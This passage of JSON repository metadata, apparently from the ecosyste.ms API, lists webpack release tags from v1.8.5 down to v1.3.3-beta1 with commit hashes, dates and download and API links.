5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/